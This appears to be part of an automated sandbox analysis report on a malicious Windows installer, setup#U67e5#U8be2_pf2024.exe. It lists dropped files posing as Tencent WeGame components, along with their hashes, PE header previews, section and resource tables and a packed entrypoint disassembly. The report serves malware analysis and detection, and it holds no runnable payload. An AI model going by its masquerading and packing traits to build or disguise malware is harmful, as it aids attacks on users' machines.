                                                              SHA-512:0C9C2A99D57BB69C809010D33FB3C740517F9FD3025ED0F75B1D895B162488D744D6106C4E32BF208DDF66E38CC0F6D5CA6C8E7C6A09F9D15F3D035759962E1E
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L......U............................|........ ....@..........................`............@.................................T#..P....@..d............&..`....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...d....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\Wegame\Lua51.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):220360
                                                              Entropy (8bit):6.732487562081231
                                                              Encrypted:false
                                                              SSDEEP:3072:TNFyI9SNhV6uAePSIGvUoQWyPZ/hNqicLwOVGSa8agpQo+YbzdHoWwK2G:TNl9SNdPSJUZtZ/jq3LwuaOddwG
                                                              MD5:34C2C19F612B0424FA1A0168557C263C
                                                              SHA1:C0F790E1FD123A4ED002B1A0D81DA65AD47B327F
                                                              SHA-256:9AAC0868A5C207125CF635A2507BFBFD9593A98246B5E8BF0445B3008B82C00D
                                                              SHA-512:8EBE3DB384F3C7F7A36872AB02F42798A1391872AD3AF76A3C6A465BC9D708ABA4C05507A19D4A20B0D28941936CD80E8EE40DBC3EA46BE34A0AD6E41B440F93
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Q...0..0..0.9/..0.R,..0../..0..0..0.9/..0.9/...0.Rich.0.........PE..L......L...........!.....p..................................................@.................................................(.................... ...<... ..........................................................L............................text....o.......p.................. ..`.rdata...:.......@..................@..@.data...DQ.......@..................@....reloc..b.... ... ..................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\Wegame\Wegame.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1467272
                                                              Entropy (8bit):6.174089075905822
                                                              Encrypted:false
                                                              SSDEEP:24576:Q+pcV+KOYOBf0gjk6PMopYX0ja7TxCYOIb4ku0PQGGL0xkFeyD6Rt:GOBf5jk6PMopCga7Twpk2GGAcPDm
                                                              MD5:6B54CAC74E2C36E9A34563018CE99AEA
                                                              SHA1:6FDDE9C794FE39624531DD444A020AC1015FA6B4
                                                              SHA-256:6698E7514F07463C766CCFE1411F4385E1BB30E73D275BEF3DF09F39AF2E3B74
                                                              SHA-512:9627CD808C86869246EE504EE2CA117615536C22CA8F22DD13E631403BEA465A99E3C90A32BD40C2E641A969473976AE194BBF613CA8B9667225D38BF700310D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........g.....]...]...].n.\...].n.\...].n.\...].n.\...].n.\...].~%]...]#o.\...]%o.\...]#o.\...]...]...]#o.\...]#oI]...]..!]...]#o.\...]Rich...]........................PE..L.....e..........#..........v......J.............@.........................................`...........................................(............0...3.............T...........................(...@............................................text...j........................... ..`.rdata...k.......l..................@..@.data........@...@...&..............@....rsrc...(............f..............@..@................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\Wegame\adapt_for_imports.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):414600
                                                              Entropy (8bit):6.498295775240253
                                                              Encrypted:false
                                                              SSDEEP:6144:S+rceBUknAFTJ7HDTpBgDqWQVgAOUqiQtwAUCnGExEakNITzHZkTUDv8XqooktqZ:By9dOwmEbokP9rfCQ5nNnuGMtd
                                                              MD5:AD13D8F6D32C21599293D230456FED48
                                                              SHA1:1667B22D9DFD2A70D8F7407A6A64F248F163C993
                                                              SHA-256:C3958B006E02D9D96CDDA10065398F9E9A4CE30CA98582B57EF2A2FEDD94589F
                                                              SHA-512:8FA40E638C724E5032CDFC936D7FC024162B68454D3BA7722D5DDFA54B076CE94817C4C965FA1F491D175C983993B2BBD897CAF649C0BC0A4AE5A9FD552B8E23
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........VFA.8.A.8.A.8.+.=.E.8.+.<...8.....D.8...<.J.8...;.J.8...=.X.8...9.E.8.H..B.8.H..i.8...9.B.8.A.9.?.8...=.J.8...8.@.8.....@.8...:.@.8.RichA.8.................PE..L...q.e...........!................$x...............................................J....@.`.......................p....'........................... ...3.......L..0f..T...................(g.......f..@............................................text............................... ..`.rdata...q.......r..................@..@.data....M...@....... ..............@....rsrc...............................@..@.reloc...L.......N..................@..B........................................................................................................................................................................................................................................................................

                                                              C:\Users\Wegame\common.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3926408
                                                              Entropy (8bit):6.768160202258329
                                                              Encrypted:false
                                                              SSDEEP:98304:0/HqH+mi3P9HwtWswIhLp+ag/B6zSoq18a:Qmi3PZOw6uJ8a
                                                              MD5:82264D93560913DC2E97C3026CB10D43
                                                              SHA1:9350F07A39624306628283DF7C8FBB0A6BE6DFA4
                                                              SHA-256:E1D02970B3CCF2CC4F702D9AFAA2329D9C6D5C1EC4CE845A10FDD172B4AF8452
                                                              SHA-512:537547C1F0D7B82CFB1EFEED8FD04001D167A7EA25F404E025FDAA5F35998C7662F6309E8560E970127872CCDF5B619BE63BC5AFF12974238FC5E171B1ABE732
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........^.@.?...?...?..hV..c=...Ik..?...W...?...W...?..g....?...W...?...W...?...W...?...W...?...GB..?..iV...?..ZV...?...GR..?...?...<..ZV...?..ZV...?..ZV...?..ZV>..?...?V..?..ZV...?..Rich.?..........................PE..L...X.e...........!......)..`......*E........)..............................`<.....uy<...@.`........................06.hs..x.7.......:...............;..3... :..1..@.2.T.....................2.......+.@.............)......,6.@....................text...|.).......)................. ..`.rdata...1....)..2....).............@..@.data.........8..t....7.............@....QMGuid.......9......f9.............@....rsrc.........:......h9.............@..@.reloc...1... :..2....9.............@..B................................................................................................................................................................................

                                                              C:\Users\Wegame\log\wegame.20240314-103812-589.log

                                                              Download File
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):270
                                                              Entropy (8bit):5.810145202540528
                                                              Encrypted:false
                                                              SSDEEP:6:7/EOQLxgYqTxMs+oMU/mR1ylTKTK/fI7Se:AOQLxgYAxJyU/mWN/fGb
                                                              MD5:C53A5DE62E6B0261028E0997C0204392
                                                              SHA1:B3549ABBB234F2916BB95E1372C2C8BB12098CE7
                                                              SHA-256:8CB0F4C1D0DD33DFDECF3A7102A29EC76A66C703B4A7FA7F361D49868C32E7AA
                                                              SHA-512:C2FF584313C30C2C67CB67483B0882A1B530D1469C50E70F544B846502EE7B111B4C9B0FDF9E447ACA85D0DC1564599AD1D1EB35309D362763673E477D504896
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:....7..e....e.......9.,(..q..E.5....ps.o....u.9[...9...R..x.t....(v.6.14....9(...Q..................................................................hJ...\.......l8@W.....A ..&.M...I;..M..>.....9v.$V.?.Y.......8U8\.kYM.._.~.m:.4.5G..v).//........w..XE.=.. ..5...R

                                                              C:\Users\Wegame\log\wegame.mem.log

                                                              Download File
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):3145890
                                                              Entropy (8bit):0.0518194268647698
                                                              Encrypted:false
                                                              SSDEEP:192:AC0DBGLDBG9itx8Qiw8QgO/PBPKWRmqyeppIsyk5uZAa+LBSjSpcg1gszaH:AqX8Qb8Ql/PY7RepX5u2/d
                                                              MD5:2AA6B637F2824121B4FD1EBC130889ED
                                                              SHA1:EE9F749227EBE42D7159FA1527D762AED451C367
                                                              SHA-256:D81637B1DAFD2EC2E920B2E8148B0ED8B4E59CD437037CB2730CD3FCEA9DE9B5
                                                              SHA-512:CAB6606C1C0D2D2CAE8A9F7CC26D969E4AE607C2C45CC99070B553693C2DE151C31D16C8E51DAEFF8A0A03EF7AD3F067402E694836467A3993071F9F3A23D2CD
                                                              Malicious:false
                                                              Preview:....7..e....e.........,.....)..aR.GF..a....n.%u.....e4V.S..)x..j.Q.....o.m.....................................................................yI .m4.F.tU#.........(y....cW..|....rS.M...6.\.....-.w.A.7.=.Y,..Ys1.$..Z..!3.xF..<bZ.0m....b../)Tw.Mk.H..........l....B....0..3...]}.....i.../.....@h........r./.o.QM.<..rgd......F.gEX....<..7...5e.#.xv5.<l..m.I....j...<.0.(.....gm}.Y..0..@!yI .m4.F.tU#.........(y..]m.$... A.L.X{..x..=.P-s..U..h..Y..v...o-E.u....|*..|...y....k...~........<.0'...7..y7.. ........6.+ .FwLy.*.."L...Tw'.r.p./Y!m.a.....Y1i....a|........A..k...A[..G`F.C._.)d.Z7+j.J.......]d.j.G.f.B2......c'{W....,}k......N......m..F.F..5J..Tm...........O......\.p?.......t.>r./.o.QM.<..rgd....Z..H.:5@.B.g..D....I7+j.J.......]d.j.G.f.B2......c'{W....,}k......N......m..F.F..5J..Tm...........O......2.Y.h...jF...T(.YvX}.w7./.3...p...^=...lY.\..-I..6.t.'.q:,..t."c..~ x.6%...y.~y.p..M.5.X.6.?`..fU.P...6.-U.|.....<.(U..M.k9.'.JZ.D8..........vTm.

                                                              C:\Users\user\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db

                                                              Download File
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):190
                                                              Entropy (8bit):4.549634503611027
                                                              Encrypted:false
                                                              SSDEEP:3:LDIdyGK3M+TUQAyiKRczQgWtBG8uU9TqMm9HwXoveeWGhBAu2sTHPzLreKvRiQGU:3TpzW85C8uUxqMm9HiovhAu2sL5pG5gz
                                                              MD5:0277A614F1920297776722D55C95E301
                                                              SHA1:E3D145F789C25496088CB7AAD5775032AEB79DBC
                                                              SHA-256:4291DE1FA6F15EEA9DCDCCA459ED331FC16CF40544C71F1190A620C83982661D
                                                              SHA-512:B2BA2705C6BD3BF08E3A71CC4214AAA76FCB1D67FC8C7103327DB968EDBBBF89C98691EBB32E9B01BA4FD0D66CBCB8C4CD6E6C67CC55F6B2162F889FD7D33997
                                                              Malicious:false
                                                              Preview:[Profile]..config1=f62a5e744c552f343904cb537e5e7581..config2=c03ffea51228692909f5ef02221df8f2..config3=b67877e560c996244de0ab3986b605ed..config4=1b3d82ff206f2697db14bb5ee90b3a8d..config5=1..

                                                              C:\Users\user\AppData\Roaming\Tencent\WeGame\Flag

                                                              Download File
                                                              Process:C:\Users\Wegame\Wegame.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16
                                                              Entropy (8bit):2.9056390622295662
                                                              Encrypted:false
                                                              SSDEEP:3:pHiQn:pHiQ
                                                              MD5:6A1DFC0D8ABB3A058CB3631ADE153B29
                                                              SHA1:8E4FFD497561F647A238A5E1B0418A77A5B657F2
                                                              SHA-256:4F89883852B6EFD64B125DE85357C68D8B9C6A80B38721822E2D7979787D5E4A
                                                              SHA-512:6B3DD19F5A55563A65916C7A9B05C06E772628342330D989E6A1AF8C80B5C6466FCEF97306FEC7B3F8964769BE2676CF6B05303771F1ABBCA6F9FC42ED07D058
                                                              Malicious:false
                                                              Preview:..........-.;...

                                                              C:\Users\winPre2k.iso

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:ISO 9660 CD-ROM filesystem data 'VMware Tools'
                                                              Category:dropped
                                                              Size (bytes):14090240
                                                              Entropy (8bit):7.81869955057579
                                                              Encrypted:false
                                                              SSDEEP:196608:mmVf72aQA1oMuWr45hrr2NVZMalqmr2lZXZ9fObDhoBjd9SuoWShEMyL2i:J7x/eJWGhrr2NCvZFObNWjqRWpMy
                                                              MD5:FB4FB91C4050A6242B5AF3DE33D328E6
                                                              SHA1:4FE0AE10ED5958A13217A4BA1B51FFD13657A9FE
                                                              SHA-256:A17A11D65F841D213FFC2D6681ACDF849C380E77055334C7A8127C1373991EBB
                                                              SHA-512:9FC21F70509C38A519074DA2971837E384FD662CA9193AA461C1540E42E4D7395746B278151AAF38C111B21B396F90460F6AE4906F41C19107C8174CD0F8F54C
                                                              Malicious:false
                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\wm.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2230488
                                                              Entropy (8bit):6.444506157324094
                                                              Encrypted:false
                                                              SSDEEP:49152:/g6aruf8oI6r9soETeat69lUuTFHSfR66Bmt0VlJdxz7:/g6ar48f6RCTeatduM
                                                              MD5:88F727E19A3DA38FF06CADAF54CE8231
                                                              SHA1:71EDD1E0219AA3B57093C6E1FFB0B1E0E610B614
                                                              SHA-256:9E867F40B3127273A637748D546771A1BAA4EAB48F7CCB11273F81CECD24FB97
                                                              SHA-512:35692E943F919D41399DCEE0DF07AAAFAF5E4E6ABA29014A6311F971DE5BAAA75A85C8A0ECF68E3BD7E96254AF777B62ECB46027F36B015A9358563839FF1909
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......O................+M.....P...........P.....P................................................&.................2...........u...........Rich....................PE..L......_.................~...v....................@.......................... "......."...@.........................P............... ...f............!..D..............T..............................@............................................text....}.......~.................. ..`.rdata..............................@..@.data.......`.......D..............@....rsrc....f... ...h..................@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................

                                                              \Device\Null

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):56
                                                              Entropy (8bit):4.530855931783247
                                                              Encrypted:false
                                                              SSDEEP:3:oNN2+WWARjTdzLNy:oNN2RWIPy
                                                              MD5:38A78E76DC2906AD16993785956103E4
                                                              SHA1:EC4BA05E28D0FB638194228E8F91F793D10BBD76
                                                              SHA-256:C95114B645D792B52FE8F88DF9931DFA49D0F78ED9948C7607EF8D0115B9A790
                                                              SHA-512:183C75A83C2187CBB7682AB769E89791CAE99ABF885C01CA6931202E98894A64DE37E51B88EF5AF867FA5F4B5D9CAA498813580469F9266E4ECDA6A0B7FED7CE
                                                              Malicious:false
                                                              Preview:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe..

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.465976192228382
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 98.39%
                                                              • Windows ActiveX control (116523/4) 1.15%
                                                              • InstallShield setup (43055/19) 0.42%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              File name:setup#U67e5#U8be2_pf2024.exe
                                                              File size:24'674'304 bytes
                                                              MD5:0b69b1391c949736c21ff137d4183b28
                                                              SHA1:754b3f30c29157940b35d865c6c1ebdb2dacb0cb
                                                              SHA256:a0e1d31cb9dc7495d9a907d91554c95d9301a75e7a639d300717e77e1ef11d64
                                                              SHA512:5b04d000fdd24613538a1c838685841d9c0a480696e403dc199e9a3423f0d79f69ab9de129c3c40d469609edd09f9d0839c48a219e0123a44f37f7e28815887e
                                                              SSDEEP:393216:JxGjJsw6OPnx/h7x/eJWGhrr2NCvZFObNWjqRWpMyi:LGmYFxzGhxvZEbU/pMyi
                                                              TLSH:8547D021FA66C03BD251127098BE867E9E3D7ED40B204CC3AB95BE4D39F52D18E77942
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M?..M...M...M...M...M...M...M...M...M...M...Me..M...M...MT..M...MT..M...M...M...M{..M...MRich...M...............

                                                              File Icon

                                                              Icon Hash:7c87e1bcf5fd1c01

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x49d818
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:
                                                              Time Stamp:0x65F2A58F [Thu Mar 14 07:21:51 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:e750e54b2eb084a7cf35fa6127d05a52

                                                              Entrypoint Preview

                                                              Instruction
                                                              clc
                                                              jmp 00007F7900B9B1A1h
                                                              jnl 00007F7900B9B125h
                                                              pushad
                                                              pop dword ptr [ecx]
                                                              sbb ebp, dword ptr [esi]
                                                              retn C1CEh
                                                              push esi
                                                              aaa
                                                              loop 00007F7900B9B1ECh
                                                              jmp 00007F7900B9B18Ah
                                                              add byte ptr [esi-63FC631Bh], bl
                                                              push ss
                                                              retf 9D73h
                                                              pushad
                                                              inc ecx
                                                              push esi
                                                              pop ebp
                                                              and al, 60h
                                                              jmp 00007F7900B9B19Bh
                                                              std
                                                              add dh, cl
                                                              push ecx
                                                              scasd
                                                              shr al, cl
                                                              cdq
                                                              pop edx
                                                              xchg ch, ah
                                                              mov seg?, sp
                                                              xchg eax, edx
                                                              jnp 00007F7900B9B164h
                                                              cmc
                                                              aad 17h
                                                              push ds
                                                              push esp
                                                              retn E672h
                                                              mov bl, E8h
                                                              adc dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              jle 00007F7900B9B15Ah
                                                              sar dh, cl
                                                              lea ebx, dword ptr [edx+74h]
                                                              shl dword ptr [ecx], cl
                                                              movsb
                                                              lds edx, fword ptr [esi-1515E80Ch]
                                                              pop esi
                                                              jmp 00007F7900B9B1AAh
                                                              mov cl, 75h
                                                              jmp far 437Ah : BD3775F9h
                                                              sbb dh, byte ptr [ebx+esi*2+3Ah]
                                                              retf 0BDEh
                                                              cmp dh, al
                                                              dec ebx
                                                              fidiv word ptr [ebx-1B0A6D48h]
                                                              add bl, byte ptr [ecx-0Bh]
                                                              sub ebx, dword ptr [ecx+16AF9690h]
                                                              aas
                                                              push edi
                                                              inc ebp
                                                              or al, byte ptr [edx-6E397E8Fh]

                                                              Rich Headers

                                                              Programming Language:
                                                              • [ C ] VS98 (6.0) SP6 build 8804
                                                              • [C++] VS98 (6.0) SP6 build 8804
                                                              • [C++] VS98 (6.0) build 8168
                                                              • [ C ] VS98 (6.0) build 8168
                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x173fd580x12c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x179d0000x2c058.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x9dbf40x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x9e0000x708.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x9cbfc0x9d00032fe94efaa7c3c91943b323f540ac818False0.6729977358678344data7.453269170375049IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rdata0x9e0000x16a42000x16a5000fe987b1bbdf9f968f985fe9a8b6a34cfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x17430000x593e80x180008764a056e8f0a959fb67a365f42c194eFalse0.33984375data6.259092758296548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x179d0000x2d0000x2d0003b161b27a20b54092642a89adec04cc7False0.2806260850694444data4.8524930302647515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              TEXTINCLUDE0x179dbe40xbASCII text, with no line terminatorsChineseChina1.7272727272727273
                                                              TEXTINCLUDE0x179dbf00x16dataChineseChina1.3636363636363635
                                                              TEXTINCLUDE0x179dc080x151C source, ASCII text, with CRLF line terminatorsChineseChina0.6201780415430267
                                                              RT_CURSOR0x179dd5c0x134dataChineseChina0.5811688311688312
                                                              RT_CURSOR0x179de900x134Targa image data - Map 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                                                              RT_CURSOR0x179dfc40x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                                                              RT_CURSOR0x179e0f80xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                                                              RT_BITMAP0x179e1ac0x248Device independent bitmap graphic, 64 x 15 x 4, image size 480ChineseChina0.3407534246575342
                                                              RT_BITMAP0x179e3f40x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.4444444444444444
                                                              RT_BITMAP0x179e5380x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.26453488372093026
                                                              RT_BITMAP0x179e6900x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2616279069767442
                                                              RT_BITMAP0x179e7e80x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2441860465116279
                                                              RT_BITMAP0x179e9400x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.24709302325581395
                                                              RT_BITMAP0x179ea980x158Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/mChineseChina0.2238372093023256
                                                              RT_BITMAP0x179ebf00x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.19476744186046513
                                                              RT_BITMAP0x179ed480x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.20930232558139536
                                                              RT_BITMAP0x179eea00x158Device independent bitmap graphic, 20 x 20 x 4, image size 240ChineseChina0.18895348837209303
                                                              RT_BITMAP0x179eff80x5e4Device independent bitmap graphic, 70 x 39 x 4, image size 1404ChineseChina0.34615384615384615
                                                              RT_BITMAP0x179f5dc0xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                                                              RT_BITMAP0x179f6940x16cDevice independent bitmap graphic, 39 x 13 x 4, image size 260ChineseChina0.28296703296703296
                                                              RT_BITMAP0x179f8000x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                                                              RT_ICON0x179f9440x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.6578014184397163
                                                              RT_ICON0x179fdac0x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.5438524590163935
                                                              RT_ICON0x17a07340x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.48358348968105064
                                                              RT_ICON0x17a17dc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.39740663900414935
                                                              RT_ICON0x17a3d840x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.3423476617855456
                                                              RT_ICON0x17a7fac0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 207360.32624768946395566
                                                              RT_ICON0x17ad4340x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 368640.2830828253100694
                                                              RT_ICON0x17b68dc0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.23367443511179464
                                                              RT_MENU0x17c71040xcdataChineseChina1.5
                                                              RT_MENU0x17c71100x284dataChineseChina0.5
                                                              RT_DIALOG0x17c73940x98dataChineseChina0.7171052631578947
                                                              RT_DIALOG0x17c742c0x17adataChineseChina0.5185185185185185
                                                              RT_DIALOG0x17c75a80xfadataChineseChina0.696
                                                              RT_DIALOG0x17c76a40xeadataChineseChina0.6239316239316239
                                                              RT_DIALOG0x17c77900x8aedataChineseChina0.39603960396039606
                                                              RT_DIALOG0x17c80400xb2dataChineseChina0.7359550561797753
                                                              RT_DIALOG0x17c80f40xccdataChineseChina0.7647058823529411
                                                              RT_DIALOG0x17c81c00xb2dataChineseChina0.6629213483146067
                                                              RT_DIALOG0x17c82740xe2dataChineseChina0.6637168141592921
                                                              RT_DIALOG0x17c83580x18cdataChineseChina0.5227272727272727
                                                              RT_STRING0x17c84e40x50dataChineseChina0.85
                                                              RT_STRING0x17c85340x2cdataChineseChina0.5909090909090909
                                                              RT_STRING0x17c85600x78dataChineseChina0.925
                                                              RT_STRING0x17c85d80x1c4dataChineseChina0.8141592920353983
                                                              RT_STRING0x17c879c0x12adataChineseChina0.5201342281879194
                                                              RT_STRING0x17c88c80x146dataChineseChina0.6288343558282209
                                                              RT_STRING0x17c8a100x40dataChineseChina0.65625
                                                              RT_STRING0x17c8a500x64dataChineseChina0.73
                                                              RT_STRING0x17c8ab40x1d8dataChineseChina0.6758474576271186
                                                              RT_STRING0x17c8c8c0x114dataChineseChina0.6376811594202898
                                                              RT_STRING0x17c8da00x24dataChineseChina0.4444444444444444
                                                              RT_GROUP_CURSOR0x17c8dc40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.25
                                                              RT_GROUP_CURSOR0x17c8dd80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.25
                                                              RT_GROUP_CURSOR0x17c8dec0x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                                              RT_GROUP_ICON0x17c8e100x76data0.7627118644067796
                                                              RT_MANIFEST0x17c8e880x1cdXML 1.0 document, ASCII text, with very long lines (461), with no line terminators0.5878524945770065

                                                              Imports

                                                              DLLImport
                                                              RASAPI32.dllRasGetConnectStatusA, RasHangUpA
